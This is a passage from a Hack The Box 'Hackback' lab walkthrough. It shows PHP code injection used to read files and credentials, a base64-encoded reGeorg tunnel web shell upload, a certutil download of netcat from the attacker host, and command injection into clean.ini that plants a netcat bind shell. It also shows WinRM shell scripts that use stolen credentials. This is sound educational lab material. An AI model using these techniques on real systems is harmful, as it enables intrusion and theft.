000009: C=302 0 L 3 W 17 Ch "1234567"
000010: C=302 0 L 3 W 17 Ch "123123"
000002: C=302 0 L 3 W 17 Ch "123456789"
000003: C=302 0 L 3 W 17 Ch "111111"
000011: C=302 0 L 3 W 17 Ch "1234567890"
000012: C=302 0 L 3 W 17 Ch "000000"
000013: C=302 0 L 3 W 17 Ch "12345"
^C
Finishing pending requests...

12345678 gave a different response length so it’s probably the password :

1
2
3
4
5
6
7
8
root@kali:~/Desktop/HTB/boxes/hackback# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=12345678&session='
Array
(
[0] => .
[1] => ..
[2] => 7cb114055494cb503306a0edd1ad1d398f6fb18e28a7a62883c24fd8ab34f66b.log
[3] => e691d0d9c19785cf4c5ab50375c10d83130f175f7f89ebd1899eee6a7aab0dd7.log
)

Yes it worked. I added my PHPSESSID cookie with the -b option and I also added it to &session=, because some stuff didn’t work without including the session cookie.
list showed us some logs. I tried the other actions, exec said Missing command but I couldn’t make it execute anything. init didn’t output anything but most likely it’s doing something that doesn’t produce an output. Also show didn’t result in any output but we will make it do soon.

Gophish

Let’s take a look at the full nmap scan :
nmap -T5 -p- hackback.htb --max-retries 1

There’s another 3rd port : 64831. I scanned that port with nmap :
nmap -sV -sT -sC -p 64831 hackback.htb

It’s https. I went there and it was gophish :

Gophish is a powerful, open-source phishing framework that makes it easy to test your organization’s exposure to phishing. -getgophish.com

I tried to login with the default credentials : admin : gophish and it worked :

It was kinda empty but I found some email templates for Facebook, HackTheBox, PayPal and Twitter.

So there are phishing sites somewhere for these sites and now we can understand what’s happening in the secret path. It’s an endpoint that shows the collected data from the phishing sites. I created a small list to search for HackTheBox phishing site :

1
2
3
4
5
6
7
8
hackthebox
hacktheboxeu
hackthebox.eu
htb
www.hackthebox
www.hacktheboxeu
www.hackthebox.eu
www.htb

Then I used wfuzz :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@kali:~/Desktop/HTB/boxes/hackback# wfuzz -c -w list.txt -H "HOST: FUZZ.htb" http://10.10.10.128

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

*****
* Wfuzz 2.3.4 - The Web Fuzzer *
*****

Target: http://10.10.10.128/
Total requests: 9

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 33 L 54 W 614 Ch "hackthebox"
000005: C=200 102 L 345 W 4110 Ch "www.hackthebox"
000008: C=200 33 L 54 W 614 Ch "www.htb"
000009: C=400 6 L 26 W 334 Ch ""
000006: C=200 33 L 54 W 614 Ch "www.hacktheboxeu"
000007: C=200 33 L 54 W 614 Ch "www.hackthebox.eu"
000002: C=200 33 L 54 W 614 Ch "hacktheboxeu"
000003: C=200 33 L 54 W 614 Ch "hackthebox.eu"
000004: C=200 33 L 54 W 614 Ch "htb"

Total time: 0.492524
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 18.27319

www.hackthebox gave a different response length so it’s the right one. I added it to /etc/hosts :

http://www.hackthebox.htb :

Just a fake Hack The Box login page. I entered test credentials :

Then I checked the secret path again and did list :

The logs increased by one. I did show and found the credentials I just sent :

1
2
root@kali:~/Desktop/HTB/boxes/hackback# curl -b "PHPSESSID=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739'                                                                                                        
[05 July 2019, 04:49:52 PM] 10.10.xx.xx - Username: test, Password: test

PHP Code Injection, Uploading Tunnel

With a functionality like this, there might be some injection somewhere. After some attempts I tried php code and it was executed :

1
2
3
root@kali:~/Desktop/HTB/boxes/hackback# curl -b "PHPSESSID=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739'
[05 July 2019, 04:49:52 PM] 10.10.xx.xx - Username: test, Password: test
[05 July 2019, 05:00:20 PM] 10.10.xx.xx - Username: , Password: whatever

The username is empty instead of printing the text I have sent, which means that it got executed as php. However all the functions we would use to get RCE like exec and system are disabled so … no we won’t have a shell now.
I wanted to list the files in the current directory so I used the scandir() function :

1
<?php print_r(scandir('.')); ?>

1
2
3
4
5
6
7
8
9
root@kali:~/Desktop/HTB/boxes/hackback# curl -b "PHPSESSID=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=33e7500a148c8300892750f3dfb8a8a1e155edd839763332d3452c9869664739'
[05 July 2019, 05:06:37 PM] 10.10.xx.xx - Username: Array
(
[0] => .
[1] => ..
[2] => index.html
[3] => webadmin.php
)
, Password: whatever

I went up one directory :

1
<?php print_r(scandir('..')); ?>

1
2
3
4
5
6
7
8
9
10
11
12
[0] => .
[1] => ..
[2] => 2bb6916122f1da34dcd916421e531578
[3] => App_Data
[4] => aspnet_client
[5] => css
[6] => img
[7] => index.php
[8] => js
[9] => logs
[10] => web.config
[11] => web.config.old

web.config and web.config.old look interesting. I checked them and in web.config.old I found some credentials. I used the file_get_contents() function :
<?php echo file_get_contents('../web.config.old'); ?>

web.config.old :

1
2
3
4
5
6
7
8
9
10
<configuration>
<system.webServer>
<authentication mode="Windows">
<identity impersonate="true"
userName="simple"
password="ZonoProprioZomaro:-("/>
</authentication>
<directoryBrowse enabled="false" showFlags="None" />
</system.webServer>
</configuration>

Credentials : simple : ZonoProprioZomaro:-(. However there’s no place to use these credentials. I went back to the http port 6666 and I executed netstat. I found that winrm was running internally :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
"CimInstanceProperties":  [
"Caption",
"Description",
"ElementName",
"InstanceID = \"::1??49852??::1??5985\"",
"CommunicationStatus",
"DetailedStatus",
"HealthState",
"InstallDate",
"Name",
"OperatingStatus",
"OperationalStatus",
"PrimaryStatus",
"Status",
"StatusDescriptions",
"AvailableRequestedStates",
"EnabledDefault = 2",
"EnabledState",
"OtherEnabledState",
"RequestedState = 5",
"TimeOfLastStateChange",
"TransitioningToState = 12",
"AggregationBehavior",
"Directionality",
"CreationTime = 12/31/1600 4:00:00 PM",
"LocalAddress = \"::1\"",
"LocalPort = 49852",
"OwningProcess = 0",
"AppliedSetting = 6",
"OffloadState = 0",
"RemoteAddress = \"::1\"",
"RemotePort = 5985",
"State = 11"
],

So somehow we need a proxy to run internally and make us able to connect to winrm. Luckily there’s reGeorgSocksProxy.
I downloaded tunnel.aspx, converted it to base-64 then I uploaded it using file_put_contents() and base64_decode() :

1
<?php file_put_contents("tunnel.aspx",base64_decode("PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBFbmFibGVTZXNzaW9uU3RhdGU9IlRydWUiJT4KPCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5OZXQiICU+CjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uTmV0LlNvY2tldHMiICU+CjwlCi8qICAgICAgICAgICAgICAgICAgIF9fX19fICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgX19fX18gICBfX19fX18gIF9ffF9fXyAgfF9fICBfX19fX18gIF9fX19fICBfX19fXyAgIF9fX19fXyAgCiB8ICAgICB8IHwgICBfX198fCAgIF9fX3wgICAgfHwgICBfX198LyAgICAgXHwgICAgIHwgfCAgIF9fX3wgCiB8ICAgICBcIHwgICBfX198fCAgIHwgIHwgICAgfHwgICBfX198fCAgICAgfHwgICAgIFwgfCAgIHwgIHwgCiB8X198XF9fXHxfX19fX198fF9fX19fX3wgIF9ffHxfX19fX198XF9fX19fL3xfX3xcX19cfF9fX19fX3wgCiAgICAgICAgICAgICAgICAgICAgfF9fX19ffAogICAgICAgICAgICAgICAgICAgIC4uLiBldmVyeSBvZmZpY2UgbmVlZHMgYSB0b29sIGxpa2UgR2VvcmcKICAgICAgICAgICAgICAgICAgICAKICB3aWxsZW1Ac2Vuc2Vwb3N0LmNvbSAvIEBfd19tX18KICBzYW1Ac2Vuc2Vwb3N0LmNvbSAvIEB0cm93YWx0cwogIGV0aWVubmVAc2Vuc2Vwb3N0LmNvbSAvIEBrYW1wX3N0YWFsZHJhYWQKCkxlZ2FsIERpc2NsYWltZXIKVXNhZ2Ugb2YgcmVHZW9yZyBmb3IgYXR0YWNraW5nIG5ldHdvcmtzIHdpdGhvdXQgY29uc2VudApjYW4gYmUgY29uc2lkZXJlZCBhcyBpbGxlZ2FsIGFjdGl2aXR5LiBUaGUgYXV0aG9ycyBvZgpyZUdlb3JnIGFzc3VtZSBubyBsaWFiaWxpdHkgb3IgcmVzcG9uc2liaWxpdHkgZm9yIGFueQptaXN1c2Ugb3IgZGFtYWdlIGNhdXNlZCBieSB0aGlzIHByb2dyYW0uCgpJZiB5b3UgZmluZCByZUdlb3JnZSBvbiBvbmUgb2YgeW91ciBzZXJ2ZXJzIHlvdSBzaG91bGQKY29uc2lkZXIgdGhlIHNlcnZlciBjb21wcm9taXNlZCBhbmQgbGlrZWx5IGZ1cnRoZXIgY29tcHJvbWlzZQp0byBleGlzdCB3aXRoaW4geW91ciBpbnRlcm5hbCBuZXR3b3JrLgoKRm9yIG1vcmUgaW5mb3JtYXRpb24sIHNlZToKaHR0cHM6Ly9naXRodWIuY29tL3NlbnNlcG9zdC9yZUdlb3JnCiovCiAgICB0cnkKICAgIHsKICAgICAgICBpZiAoUmVxdWVzdC5IdHRwTWV0aG9kID09ICJQT1NUIikKICAgICAgICB7CiAgICAgICAgICAgIC8vU3RyaW5nIGNtZCA9IFJlcXVlc3QuSGVhZGVycy5HZXQoIlgtQ01EIik7CiAgICAgICAgICAgIFN0cmluZyBjbWQgPSBSZXF1ZXN0LlF1ZXJ5U3RyaW5nLkdldCgiY21kIikuVG9VcHBlcigpOwogICAgICAgICAgICBpZiAoY21kID09ICJDT05ORUNUIikKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgdHJ5CiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgU3RyaW5nIHRhcmdldCA9IFJlcXVlc3QuUXVlcnlTdHJpbmcuR2V0KCJ0YXJnZXQiKS5Ub1VwcGVyKCk7CiAgICAgICAgICAgICAgICAgICAgLy9SZXF1ZXN0LkhlYWRlcnMuR2V0KCJYLVRBUkdFVCIpOwogICAgICAgICAgICAgICAgICAgIGludCBwb3J0ID0gaW50LlBhcnNlKFJlcXVlc3QuUXVlcnlTdHJpbmcuR2V0KCJwb3J0IikpOwogICAgICAgICAgICAgICAgICAgIC8vUmVxdWVzdC5IZWFkZXJzLkdldCgiWC1QT1JUIikpOwogICAgICAgICAgICAgICAgICAgIElQQWRkcmVzcyBpcCA9IElQQWRkcmVzcy5QYXJzZSh0YXJnZXQpOwogICAgICAgICAgICAgICAgICAgIFN5c3RlbS5OZXQuSVBFbmRQb2ludCByZW1vdGVFUCA9IG5ldyBJUEVuZFBvaW50KGlwLCBwb3J0KTsKICAgICAgICAgICAgICAgICAgICBTb2NrZXQgc2VuZGVyID0gbmV3IFNvY2tldChBZGRyZXNzRmFtaWx5LkludGVyTmV0d29yaywgU29ja2V0VHlwZS5TdHJlYW0sIFByb3RvY29sVHlwZS5UY3ApOwogICAgICAgICAgICAgICAgICAgIHNlbmRlci5Db25uZWN0KHJlbW90ZUVQKTsKICAgICAgICAgICAgICAgICAgICBzZW5kZXIuQmxvY2tpbmcgPSBmYWxzZTsKICAgICAgICAgICAgICAgICAgICBTZXNzaW9uLkFkZCgic29ja2V0Iiwgc2VuZGVyKTsKICAgICAgICAgICAgICAgICAgICBSZXNwb25zZS5BZGRIZWFkZXIoIlgtU1RBVFVTIiwgIk9LIik7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBjYXRjaCAoRXhjZXB0aW9uIGV4KQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1FUlJPUiIsIGV4Lk1lc3NhZ2UpOwogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiRkFJTCIpOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIGVsc2UgaWYgKGNtZCA9PSAiRElTQ09OTkVDVCIpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIHRyeSB7CiAgICAgICAgICAgICAgICAgICAgU29ja2V0IHMgPSAoU29ja2V0KVNlc3Npb25bInNvY2tldCJdOwogICAgICAgICAgICAgICAgICAgIHMuQ2xvc2UoKTsKICAgICAgICAgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBleCl7CgogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgU2Vzc2lvbi5BYmFuZG9uKCk7CiAgICAgICAgICAgICAgICBSZXNwb25zZS5BZGRIZWFkZXIoIlgtU1RBVFVTIiwgIk9LIik7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSBpZiAoY21kID09ICJGT1JXQVJEIikKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgU29ja2V0IHMgPSAoU29ja2V0KVNlc3Npb25bInNvY2tldCJdOwogICAgICAgICAgICAgICAgdHJ5CiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgaW50IGJ1ZmZMZW4gPSBSZXF1ZXN0LkNvbnRlbnRMZW5ndGg7CiAgICAgICAgICAgICAgICAgICAgYnl0ZVtdIGJ1ZmYgPSBuZXcgYnl0ZVtidWZmTGVuXTsKICAgICAgICAgICAgICAgICAgICBpbnQgYyA9IDA7CiAgICAgICAgICAgICAgICAgICAgd2hpbGUgKChjID0gUmVxdWVzdC5JbnB1dFN0cmVhbS5SZWFkKGJ1ZmYsIDAsIGJ1ZmYuTGVuZ3RoKSkgPiAwKQogICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgcy5TZW5kKGJ1ZmYpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICBSZXNwb25zZS5BZGRIZWFkZXIoIlgtU1RBVFVTIiwgIk9LIik7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBjYXRjaCAoRXhjZXB0aW9uIGV4KQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1FUlJPUiIsIGV4Lk1lc3NhZ2UpOwogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiRkFJTCIpOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIGVsc2UgaWYgKGNtZCA9PSAiUkVBRCIpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIFNvY2tldCBzID0gKFNvY2tldClTZXNzaW9uWyJzb2NrZXQiXTsKICAgICAgICAgICAgICAgIHRyeQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgIGludCBjID0gMDsKICAgICAgICAgICAgICAgICAgICBieXRlW10gcmVhZEJ1ZmYgPSBuZXcgYnl0ZVs1MTJdOwogICAgICAgICAgICAgICAgICAgIHRyeQogICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUgKChjID0gcy5SZWNlaXZlKHJlYWRCdWZmKSkgPiAwKQogICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBieXRlW10gbmV3QnVmZiA9IG5ldyBieXRlW2NdOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgLy9BcnJheS5Db25zdHJhaW5lZENvcHkocmVhZEJ1ZmYsIDAsIG5ld0J1ZmYsIDAsIGMpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgU3lzdGVtLkJ1ZmZlci5CbG9ja0NvcHkocmVhZEJ1ZmYsIDAsIG5ld0J1ZmYsIDAsIGMpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQmluYXJ5V3JpdGUobmV3QnVmZik7CiAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQWRkSGVhZGVyKCJYLVNUQVRVUyIsICJPSyIpOwogICAgICAgICAgICAgICAgICAgIH0gICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgIGNhdGNoIChTb2NrZXRFeGNlcHRpb24gc29leCkKICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiT0siKTsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIGNhdGNoIChFeGNlcHRpb24gZXgpCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQWRkSGVhZGVyKCJYLUVSUk9SIiwgZXguTWVzc2FnZSk7CiAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQWRkSGVhZGVyKCJYLVNUQVRVUyIsICJGQUlMIik7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH0gCiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgUmVzcG9uc2UuV3JpdGUoIkdlb3JnIHNheXMsICdBbGwgc2VlbXMgZmluZSciKTsKICAgICAgICB9CiAgICB9CiAgICBjYXRjaCAoRXhjZXB0aW9uIGV4S2FrKQogICAgewogICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1FUlJPUiIsIGV4S2FrLk1lc3NhZ2UpOwogICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiRkFJTCIpOwogICAgfQolPgoK")); ?>


Then I checked the tunnel :

Great !

Running the Proxy Server, Shell as simple

First thing to do is to configure proxychains to use whatever port we like, I used 8888 :
/etc/proxychains.conf :

Then I used reGeorgSocksProxy.py and gave it the port and the path :

1
python reGeorgSocksProxy.py -p 8888 -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx


Now we can connect as simple. I used Alamot’s winrm ruby shell :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/ruby
require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new(
endpoint: 'http://10.10.10.128:5985/wsman',
transport: :ssl,
user: 'simple',
password: 'ZonoProprioZomaro:-(',
:no_ssl_peer_verification => true
)

command=""

conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = STDIN.gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end


And …. no flag !

clean.ini , Shell as hacker

I checked c:\ and found a strange directory called util :

c:\util:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS hackback\simple@HACKBACK C:\> cd util                              
PS hackback\simple@HACKBACK util> ls

Directory: C:\util

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/14/2018 3:30 PM PingCastle

-a---- 3/8/2007 12:12 AM 139264 Fping.exe

-a---- 3/29/2017 7:46 AM 312832 kirbikator.exe

-a---- 12/14/2018 3:42 PM 1404 ms.hta

-a---- 2/29/2016 12:04 PM 359336 PSCP.EXE

-a---- 2/29/2016 12:04 PM 367528 PSFTP.EXE

-a---- 5/4/2018 12:21 PM 23552 RawCap.exe

However there was a hidden directory, if we do dir -force :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PS hackback\simple@HACKBACK util> dir -force

Directory: C:\util

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/14/2018 3:30 PM PingCastle

d--h-- 12/21/2018 6:21 AM scripts

-a---- 3/8/2007 12:12 AM 139264 Fping.exe

-a---- 3/29/2017 7:46 AM 312832 kirbikator.exe

-a---- 12/14/2018 3:42 PM 1404 ms.hta

-a---- 2/29/2016 12:04 PM 359336 PSCP.EXE

-a---- 2/29/2016 12:04 PM 367528 PSFTP.EXE

-a---- 5/4/2018 12:21 PM 23552 RawCap.exe

A new directory appeared : scripts. looking in that directory :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PS hackback\simple@HACKBACK util> cd scripts
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
Could not find item C:\util\scripts.
At line:1 char:56
+ ... join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name), ...
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\util\scripts:String) [Get-Item], IOException
+ FullyQualifiedErrorId : ItemNotFound,Microsoft.PowerShell.Commands.GetItemCommand
PS hackback\simple@HACKBACK > ls

Directory: C:\util\scripts

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/13/2018 2:54 PM spool
-a---- 12/21/2018 5:44 AM 84 backup.bat
-a---- 7/5/2019 5:34 PM 39 batch.log
-a---- 7/5/2019 6:07 PM 135 clean.ini
-a---- 12/8/2018 9:17 AM 1232 dellog.ps1
-a---- 7/5/2019 5:34 PM 36 log.txt

Without talking too much about the rabbit holes and the failed attempts. If we check clean.ini :

1
2
3
4
5
PS hackback\simple@HACKBACK > type clean.ini
[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt
Directory=c:\inetpub\logs\logfiles

Obviously it gets executed from time to time, and it’s the only writable thing by simple in that directory. We can inject commands in LogFile which means that we can make another user execute our commands. I tried to upload nc.exe but :

1
2
3
4
5
6
7
8
9
PS hackback\simple@HACKBACK > certutil -urlcache -split -f http://10.10.xx.xx/nc64.exe C:\windows\system32\spool\drivers\color\nc.exe
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
At line:1 char:1
+ certutil -urlcache -split -f http://10.10.xx.xx/nc64.exe C:\windows\s ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Expected. I terminated that winrm session and used Alamot’s other winrm shell that had upload and download capabilities :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#!/usr/bin/ruby

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt

conn = WinRM::Connection.new(
endpoint: 'http://10.10.10.128:5985/wsman',
user: 'simple',
password: 'ZonoProprioZomaro:-(',
)

file_manager = WinRM::FS::FileManager.new(conn)


class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end


command=""

conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = STDIN.gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
if command.start_with?('DOWNLOAD') then
download_command = command.tokenize
print("Downloading " + download_command[1] + " to " + download_command[2])
file_manager.download(download_command[1], download_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end

output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end

Then I uploaded nc.exe to C:\windows\system32\spool\drivers\color\ (to bypass applocker) :

1
2
3
4
5
6
7
8
9
10
11
root@kali:~/Desktop/HTB/boxes/hackback# proxychains ./winrm2.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
PS hackback\simple@HACKBACK Documents> UPLOAD /root/Desktop/HTB/boxes/hackback/nc.exe C:\windows\system32\spool\drivers\color\nc.exe
Uploading /root/Desktop/HTB/boxes/hackback/nc.exe to C:\windows\system32\spool\drivers\color\nc.exe|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-10.10.10.128:5985-<><>-OK
26892 bytes of 51488 bytes copied
51488 bytes of 51488 bytes copied

OK
PS hackback\simple@HACKBACK Documents>

After that I used simple echo commands to edit clean.ini. It should look like this :

1
2
3
4
[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe
Directory=c:\inetpub\logs\logfiles

This way we can get a bind shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\util\scripts> echo [Main] > C:\util\scripts\clean.ini
echo [Main] > C:\util\scripts\clean.ini
PS C:\util\scripts> echo LifeTime=100 >> C:\util\scripts\clean.ini
echo LifeTime=100 >> C:\util\scripts\clean.ini
PS C:\util\scripts> echo "LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe" >> C:\util\scripts\clean.ini
echo "LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe" >> C:\util\scripts\clean.ini
PS C:\util\scripts> echo "Directory=c:\inetpub\logs\logfiles" >> C:\util\scripts\clean.ini
echo "Directory=c:\inetpub\logs\logfiles" >> C:\util\scripts\clean.ini
PS C:\util\scripts> cat clean.ini
cat clean.ini
[Main]
LifeTime=100
LogFile=c:\util\scripts\log.txt & cmd.exe /c C:\windows\system32\spool\drivers\color\nc.exe -lvp 1338 -e cmd.exe Directory=c:\inetpub\logs\logfiles
PS C:\util\scripts>

After some time the listener starts and we can connect to port 1338 through the proxy :

Finally we owned user !

UserLogger, Filesystem Access as System, Root Flag

After getting a shell as hacker I did my regular Windows enumeration, one thing I wanted to check was the services, I remembered the services list I got from port 6666 so I checked that.
I noticed a strange service called UserLogger :

1
2
3
4
"name":  "UserLogger",
"startname": "LocalSystem",
"displayname": "User Logger",
"status": "OK"

So I checked the entry of that service in registry :

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\>reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger
Type REG_DWORD 0x10
Start REG_DWORD 0x3
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ c:\windows\system32\UserLogger.exe
ObjectName REG_SZ LocalSystem
DisplayName REG_SZ User Logger
Description REG_SZ This service is responsible for logging user activity

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UserLogger\Security

Description says it’s responsible for logging user activity. I tried to start that service as hacker :

1
2
3
4
5
6
7
8
9
10
11
12
13
C:\Windows\system32>sc start userlogger
sc start userlogger

SERVICE_NAME: userlogger
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1368
FLAGS :

hacker was allowed to start and stop the service. I started to look more into the service and test it. I created a test file and called it test.txt then I started the service and gave it the file as a parameter : sc start userlogger test.txt. It created a new file called test.txt.log :

1
2
3
4
5
6
C:\Users\hacker\Documents>type test.txt.log
type test.txt.log

Logfile specified!
Service is starting
Service is running

Nothing interesting, however when I checked the permissions of that file :

1
2
3
4
C:\Users\hacker\Documents>cacls C:\Users\hacker\Documents\test.txt.log
cacls C:\Users\hacker\Documents\test.txt.log

C:\Users\hacker\Documents\test.txt.log Everyone: F

It’s readable by everyone. This means we can use this service to read anything we don’t have access to, but how will we do that ? it adds .log after the file name ..
Since windows doesn’t accept : in filenames we can try to read root.txt like this : sc start userlogger C:\users\administrator\desktop\root.txt:
When it tries to add .log everything after : will be removed and the new permissions will be applied to root.txt :

1
2
3
4
5
6
7
8
9
10
11
12
13
